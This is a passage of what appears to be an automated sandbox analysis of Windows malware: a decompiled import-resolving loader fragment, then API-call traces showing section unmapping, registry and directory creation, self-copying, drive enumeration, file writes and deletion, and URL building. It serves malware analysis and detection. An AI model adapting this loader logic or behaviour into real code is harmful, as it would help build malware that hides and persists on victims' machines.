						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
